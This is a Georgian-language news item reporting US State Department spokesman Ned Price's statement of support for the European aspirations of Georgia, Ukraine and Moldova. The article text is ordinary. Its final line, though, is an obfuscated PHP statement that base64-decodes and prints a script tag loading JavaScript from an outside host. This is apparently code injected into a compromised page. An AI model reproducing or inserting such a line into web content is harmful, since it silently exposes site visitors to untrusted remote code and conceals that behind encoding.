celsiusi
ავერსი შნაიდერი
აშშ-ის სახელმწიფო დეპარტამენტის წარმომადგენელი ნედ პრაისი აცხადებს, რომ ამერიკის შეერთებული შტატები, როგორც სტრატეგიული პარტნიორი, მტკიცედ უჭერს მხარს საქართველოს, უკრაინისა და მოლდოვის ევროპულ მისწრაფებებს.
 
ნედ პრაისმა ამის შესახებ, დღეს გამართულ ბრიფინგზე, საქართველოს, უკრაინისა და მოლდოვის მხრიდან კანდიდატის სტატუსის თაობაზე ევროკავშირის გადაწყვეტილების მოლოდინთან დაკავშირებული კითხვის საპასუხოდ ისაუბრა.
 
„ეს საკითხი აღნიშნულ სამ ქვეყნას და ევროკავშირს ეხება. თუმცა, როგორც სტრატეგიული პარტნიორი, აშშ მტკიცედ უჭერს მხარს საქართველოს, უკრაინისა და მოლდოვის ევროპულ მისწრაფებებსა და ევროპულ ამბიციებს.
 
ჩვენ ამ ქვეყნების გვერდით ვიდექით ამ გზაზე, მათ მიერ დამოუკიდებლობის მოპოვების დღიდან დღემდე და გავაგრძელებთ ამ გზაზე მათ გვერდით დგომას“, – განაცხადა ნედ პრაისმა.
 
694
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");